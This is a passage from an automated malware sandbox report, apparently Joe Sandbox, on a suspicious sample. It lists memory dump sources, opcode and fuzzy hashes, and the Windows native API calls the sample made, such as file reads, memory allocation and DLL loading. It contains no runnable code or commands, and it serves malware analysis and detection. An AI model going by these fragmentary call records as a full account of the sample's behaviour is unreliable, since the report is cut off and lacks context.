                                                                                                                              • Opcode Fuzzy Hash: e00076b986848d3ba1095fd856cf00661b6f7ca5efb77dde8303e6a154a9dbe0
                                                                                                                              • Instruction Fuzzy Hash: 4021C175A043049FDB14DF14D984B16BB65EBC4314F24C56ADA4A4B386C336E846CA62
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1538079208.0000000000CDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CDD000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_cdd000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 4dc019dcd8ebc7f72b1355efe4d193413ef7203ad5bc4f77f4cbd6d6c338fd0a
                                                                                                                              • Instruction ID: 44766b116073273e91aad5c800c3d6aee13761a5a15bafd37140912358e4c238
                                                                                                                              • Opcode Fuzzy Hash: 4dc019dcd8ebc7f72b1355efe4d193413ef7203ad5bc4f77f4cbd6d6c338fd0a
                                                                                                                              • Instruction Fuzzy Hash: 8C21F275A04304EFDB05DF10D9C4B26BBA5FB84314F20C6AEEA4A4B392C336DC46CA61
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1538079208.0000000000CDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CDD000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_cdd000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 24ed2deb6a89f50456438308c6199903480edb59ecc32e09b7646b4c8443609d
                                                                                                                              • Instruction ID: 70da1fb145da6b6d1e7d8a4446f343ab8c66fe0616a27233b2fbdeb9176068aa
                                                                                                                              • Opcode Fuzzy Hash: 24ed2deb6a89f50456438308c6199903480edb59ecc32e09b7646b4c8443609d
                                                                                                                              • Instruction Fuzzy Hash: 7F218E755093808FCB12CF24D990715BF71EB86314F28C5EBD9498B6A7C33A980ACB62
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1538021874.0000000000CCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CCD000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_ccd000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                                                                                              • Instruction ID: 2a0b40d27812605ca7ba8455b4cb4fa6f92b3aae2276eee61cd1b97019105487
                                                                                                                              • Opcode Fuzzy Hash: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                                                                                              • Instruction Fuzzy Hash: 39110376504240DFCB05CF00D9C0B16BF72FB94324F24C2ADD90A0B256C33AE956CBA1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1538079208.0000000000CDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CDD000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_cdd000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
                                                                                                                              • Instruction ID: 00dab7302c501ef7946a848be0dc2b39d0e7d11949ce43b296e6335a1d8c2c45
                                                                                                                              • Opcode Fuzzy Hash: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
                                                                                                                              • Instruction Fuzzy Hash: A911A975904280DFCB01DF10C5C0B15FBA2FB84324F24C6AAD94A4B796C33AD84ACB61
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1538021874.0000000000CCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CCD000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_ccd000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: ecd8a30292e6e380ddc054a2974c4aa53bd878f0a91457232c851deae7165041
                                                                                                                              • Instruction ID: f2d338de46a959ea259210738e42d620afd61fd67a951445be0591642b53a87f
                                                                                                                              • Opcode Fuzzy Hash: ecd8a30292e6e380ddc054a2974c4aa53bd878f0a91457232c851deae7165041
                                                                                                                              • Instruction Fuzzy Hash: 0301A2714083489BE7105A26CDC4F66BFD8EF81725F28C47EED1A5A686D2789840CBB2
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1538021874.0000000000CCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CCD000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_ccd000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 89a2c4d24c3d2b7bcbae6be9b956d426fe5ff2da9c50ecee0dc78f92005b3440
                                                                                                                              • Instruction ID: a655ec7adc7f18bf948d368ba20896d6788e2ce4a0e21a35cfa2eb060e61e2e4
                                                                                                                              • Opcode Fuzzy Hash: 89a2c4d24c3d2b7bcbae6be9b956d426fe5ff2da9c50ecee0dc78f92005b3440
                                                                                                                              • Instruction Fuzzy Hash: FFF0C2310043449EE7108A15CD84B62FFD8EB80734F28C46EED195E286C2789840CBB1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1543522382.0000000004F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_4f80000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: d4566cbcdc7ca4a35dcedc2bc996d7f5f41312fef603ccaa58c79dcebd0b26d5
                                                                                                                              • Instruction ID: 169addebfdac9c24dc83ecf102307d8687509ecfcc46e7f6f65a2ae8c47c9fef
                                                                                                                              • Opcode Fuzzy Hash: d4566cbcdc7ca4a35dcedc2bc996d7f5f41312fef603ccaa58c79dcebd0b26d5
                                                                                                                              • Instruction Fuzzy Hash: 8E1265F04027498ED732EF66ED6C1893BB1B745318B90430AD2E56A2E9D7BE154BCF44
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1538629085.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_e30000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: eaf02b1e9d22e126d31922eb6c16f1f54d4cbe4e0788976abc4920c41e3d861f
                                                                                                                              • Instruction ID: 20509bfb59d5bccb7a6e7845804ced38fa643a75da81484f842fdaa5f20d0a40
                                                                                                                              • Opcode Fuzzy Hash: eaf02b1e9d22e126d31922eb6c16f1f54d4cbe4e0788976abc4920c41e3d861f
                                                                                                                              • Instruction Fuzzy Hash: BAA16B32E002098FCF19DFA5C88859EBBF2BF85304F15957AE801BB265DB75E915CB90
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1543522382.0000000004F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_4f80000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 5f92b703eed45d7e8b4158981078a80c55e37e19b4f0951ff5ffce072841d280
                                                                                                                              • Instruction ID: 6007475685b89d427465aee7bec07cfdde663a9859a18189205d2b5c4933b115
                                                                                                                              • Opcode Fuzzy Hash: 5f92b703eed45d7e8b4158981078a80c55e37e19b4f0951ff5ffce072841d280
                                                                                                                              • Instruction Fuzzy Hash: 5EC1F8F180278A8FD732DF66EC681893BB1BB85314B50430AD1A16B2D9DBBE154BCF44

                                                                                                                              Execution Graph

                                                                                                                              Execution Coverage:1.4%
                                                                                                                              Dynamic/Decrypted Code Coverage:2.7%
                                                                                                                              Signature Coverage:5.8%
                                                                                                                              Total number of Nodes:548
                                                                                                                              Total number of Limit Nodes:69
                                                                                                                              execution_graph: node and edge data of the interactive execution-graph widget (548 nodes, 69 limit nodes); the listed graph begins at 41f080 and its nodes resolve to LdrLoadDll, LdrInitializeThunk, NtCreateFile, NtReadFile, NtClose, NtAllocateVirtualMemory, RtlAllocateHeap, RtlFreeHeap, ExitProcess, LookupPrivilegeValueW and PostThreadMessageW.

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 0 41a3d0-41a419 call 41af20 NtReadFile
APIs
• NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A415
Memory Dump Source
• Source File: 00000004.00000002.1669134276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_JHnNxt6Pnb.jbxd
Similarity
• API ID: FileRead
• String ID: !JA$bMA$bMA
• API String ID: 2738559852-4222312340

APIs
• LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD52
Memory Dump Source
• Source File: 00000004.00000002.1669134276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_JHnNxt6Pnb.jbxd
Similarity
• API ID: Load
• String ID:
• API String ID: 2234796835-0

APIs
• NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A36D
Memory Dump Source
• Source File: 00000004.00000002.1669134276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_JHnNxt6Pnb.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0

APIs
• NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A36D
Memory Dump Source
• Source File: 00000004.00000002.1669134276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_JHnNxt6Pnb.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0

APIs
• NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B0F4,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A539
Memory Dump Source
• Source File: 00000004.00000002.1669134276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_JHnNxt6Pnb.jbxd
Similarity
• API ID: AllocateMemoryVirtual
• String ID:
• API String ID: 2167126740-0

APIs
• NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B0F4,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A539
Memory Dump Source
• Source File: 00000004.00000002.1669134276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_JHnNxt6Pnb.jbxd
Similarity
• API ID: AllocateMemoryVirtual
• String ID:
• API String ID: 2167126740-0

APIs
• NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A475
Memory Dump Source
• Source File: 00000004.00000002.1669134276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_JHnNxt6Pnb.jbxd
Similarity
• API ID: Close
• String ID:
• API String ID: 3535843008-0

APIs
• NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A475
Memory Dump Source
• Source File: 00000004.00000002.1669134276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_JHnNxt6Pnb.jbxd
Similarity
• API ID: Close
• String ID:
• API String ID: 3535843008-0

Memory Dump Source
• Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0

Memory Dump Source
• Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0

Memory Dump Source
• Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0

Memory Dump Source
• Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 65fb186c9a0cff96255c3ba435a04406155e1625779291de4d627712075f0961
                                                                                                                              • Instruction ID: 75724a6374dbcf6ac54fe4e1a3e69f1c88db8a02fba0ba506a94422fde050f7f
                                                                                                                              • Opcode Fuzzy Hash: 65fb186c9a0cff96255c3ba435a04406155e1625779291de4d627712075f0961
                                                                                                                              • Instruction Fuzzy Hash: 31900221642441525545B15844046074016A7E0241B96C112B1418950CC52A9957E721
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: b389484a534caa934c474612c2f5bb80d6c59a8f771b9333a90b51f0cacc7c21
                                                                                                                              • Instruction ID: a474420a9d9a296e34d5ec9cc4839fa19b5b7ddac1e4642167f0e7c76a4c27b1
                                                                                                                              • Opcode Fuzzy Hash: b389484a534caa934c474612c2f5bb80d6c59a8f771b9333a90b51f0cacc7c21
                                                                                                                              • Instruction Fuzzy Hash: 9B90022170140003D140715854187064015E7E1301F56D111F0418554CD91989576322
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 29f5e6604fae9e66a4ee782b6b09fb34c558ce05fe6daf090f931cea20577b15
                                                                                                                              • Instruction ID: e59daad0b45ab05832cdd42cf8356a111a4aafc22c6b3bd65848a07cfd5be560
                                                                                                                              • Opcode Fuzzy Hash: 29f5e6604fae9e66a4ee782b6b09fb34c558ce05fe6daf090f931cea20577b15
                                                                                                                              • Instruction Fuzzy Hash: 0A90022961340002D1807158540870A001597D1202F96D515B0019558CC919896A6321
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: a12e8fa2e0c6589e7b9a9cb1bc82fe9cbea2ec92ba1ce2f1b7f3ba0cea39d09f
                                                                                                                              • Instruction ID: 368fbd4991cc3ac5c49f4253dea178d01d551c7cf3260ff5fc23ef01099a2010
                                                                                                                              • Opcode Fuzzy Hash: a12e8fa2e0c6589e7b9a9cb1bc82fe9cbea2ec92ba1ce2f1b7f3ba0cea39d09f
                                                                                                                              • Instruction Fuzzy Hash: 9E90023160140402D10075985408746001597E0301F56D111B5028555EC66989927231
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 54e6a49b9fb8295bc3ede5f177b96a627e0237f8f84ef550913c0cdd58d93062
                                                                                                                              • Instruction ID: a7af68e280d3668a7584b7941adeffe58d976fd3bf3b5a4b0198f80521615792
                                                                                                                              • Opcode Fuzzy Hash: 54e6a49b9fb8295bc3ede5f177b96a627e0237f8f84ef550913c0cdd58d93062
                                                                                                                              • Instruction Fuzzy Hash: 1690023160148802D1107158840474A001597D0301F5AC511B4428658DC69989927221
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 8949c07783033be8874902c5e781a7c46706c381aa1126b49be1074c5a16d67b
                                                                                                                              • Instruction ID: 2167dd51f1e39d47906726c5cdda8df23b187a1793f4b55ff7c05ce65b76dd58
                                                                                                                              • Opcode Fuzzy Hash: 8949c07783033be8874902c5e781a7c46706c381aa1126b49be1074c5a16d67b
                                                                                                                              • Instruction Fuzzy Hash: 88900221A0140042414071688844A064015BBE1211B56C221B099C550DC55D89666765
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: c477fbffae8f4c91e3ee56d3433bdfbd55627d39303b50c6ac5ac8c4e35a3145
                                                                                                                              • Instruction ID: d2f804fbd33e7f92727cac5befaa9dd6899f1d692c1575426cd5012683e347d9
                                                                                                                              • Opcode Fuzzy Hash: c477fbffae8f4c91e3ee56d3433bdfbd55627d39303b50c6ac5ac8c4e35a3145
                                                                                                                              • Instruction Fuzzy Hash: 6690023160180402D1007158481470B001597D0302F56C111B1168555DC62989527671
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: c2d5dbdec7f7e7bf6f8f1e043ed2378a27d16b5aeedbb3c871df1cc660126ddc
                                                                                                                              • Instruction ID: 3f6b8e9ec51c0890db71b4303a2d19c3867be48ff1e8c9bc7c06468ed09f61d5
                                                                                                                              • Opcode Fuzzy Hash: c2d5dbdec7f7e7bf6f8f1e043ed2378a27d16b5aeedbb3c871df1cc660126ddc
                                                                                                                              • Instruction Fuzzy Hash: 06900221611C0042D20075684C14B07001597D0303F56C215B0158554CC91989626621
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 6fac5a568b75b9527b7f0bceba557f183d062b2af6acf16c95179e6436b501f0
                                                                                                                              • Instruction ID: e2dea06492df0d8403aff3fe1b3b52050da518b460b6db0d07b0d2d11ca15833
                                                                                                                              • Opcode Fuzzy Hash: 6fac5a568b75b9527b7f0bceba557f183d062b2af6acf16c95179e6436b501f0
                                                                                                                              • Instruction Fuzzy Hash: 7490026174140442D10071584414B060015D7E1301F56C115F1068554DC61DCD537226
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 15a3f4d7318d6915532b324515bc6ca359a4e825a2b5bccdee56aa5d270be660
                                                                                                                              • Instruction ID: eb92ef0cdd945353d4be0367e3884209dacaee45e6155fd2966ecfb54085fe78
                                                                                                                              • Opcode Fuzzy Hash: 15a3f4d7318d6915532b324515bc6ca359a4e825a2b5bccdee56aa5d270be660
                                                                                                                              • Instruction Fuzzy Hash: 5490027160140402D14071584404746001597D0301F56C111B5068554EC65D8ED67765
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 4b0b0a33db38829d5c91caa0150357dc20aed6d83d685be4bd11bb521b775196
                                                                                                                              • Instruction ID: 697f7548111cbf2279749d5a2bf76169088c0eda347b40fbf7a8e3cb0a106016
                                                                                                                              • Opcode Fuzzy Hash: 4b0b0a33db38829d5c91caa0150357dc20aed6d83d685be4bd11bb521b775196
                                                                                                                              • Instruction Fuzzy Hash: A4900221A0140502D10171584404716001A97D0241F96C122B1028555ECA298A93B231
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1669134276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_400000_JHnNxt6Pnb.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 853c01b66d24f589df6b89bde03758f04558a5ab365de05a0f584bb7a63a4c44
                                                                                                                              • Instruction ID: 4f20240aff7f2371bb6e5cfcebb6b85206ba00274494e6c7b70a30fa46eb6871
                                                                                                                              • Opcode Fuzzy Hash: 853c01b66d24f589df6b89bde03758f04558a5ab365de05a0f584bb7a63a4c44
                                                                                                                              • Instruction Fuzzy Hash: 48213CB2D4420957CB25D664AD52BFF737CAB54314F04007FE949A3182F638BF498BA6
                                                                                                                              Control-flow Graph (interactive graph not rendered; legend: Executed / Not Executed)
                                                                                                                              • Graph data: control_flow_graph 3 41a5f0-41a621 call 41af20 RtlAllocateHeap
                                                                                                                              APIs
                                                                                                                              • RtlAllocateHeap.NTDLL(&EA,?,00414C9F,00414C9F,?,00414526,?,?,?,?,?,00000000,00409CE3,?), ref: 0041A61D
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1669134276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_400000_JHnNxt6Pnb.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocateHeap
                                                                                                                              • String ID: &EA
                                                                                                                              • API String ID: 1279760036-1330915590
                                                                                                                              • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                              • Instruction ID: 65e1271fa0e6f293e5ca7d904ec396d69fb6d51de338ced040ab1bfa87458b74
                                                                                                                              • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                              • Instruction Fuzzy Hash: 1DE012B2200208ABDB14EF99DC41EA777ADAF88668F118559BA085B242C630F9118AB0
                                                                                                                              Control-flow Graph (interactive graph not rendered; legend: Executed / Not Executed)
                                                                                                                              • Graph data: control_flow_graph 201 4082d3-4082e7 202 4082e9-4082fd call 41b710 201->202 203 40831e-40835a call 41be20 call 41c9c0 call 40ace0 call 414e40 201->203 214 40835c-40836e PostThreadMessageW 203->214 215 40838e-408392 203->215 216 408370-40838a call 40a470 214->216 217 40838d 214->217 216->217 217->215
                                                                                                                              APIs
                                                                                                                              • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1669134276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_400000_JHnNxt6Pnb.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: MessagePostThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1836367815-0
                                                                                                                              • Opcode ID: fa219bae15b0da85c67c1ee57d7a5492c2843938ffc609705adf7c38e76ccc51
                                                                                                                              • Instruction ID: cccecc87c1ea1b2e49a02ea573b714a3824719a0686cf2f5ae3b0575679c9a49
                                                                                                                              • Opcode Fuzzy Hash: fa219bae15b0da85c67c1ee57d7a5492c2843938ffc609705adf7c38e76ccc51
                                                                                                                              • Instruction Fuzzy Hash: 1F1108B2940328ABDB11A6549C02FEE3358AB84B55F05016EFF44BB2C1DBBD6D0547F5

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 220 408309-40835a call 41be20 call 41c9c0 call 40ace0 call 414e40 230 40835c-40836e PostThreadMessageW 220->230 231 40838e-408392 220->231 232 408370-40838a call 40a470 230->232 233 40838d 230->233 232->233 233->231
                                                                                                                              APIs
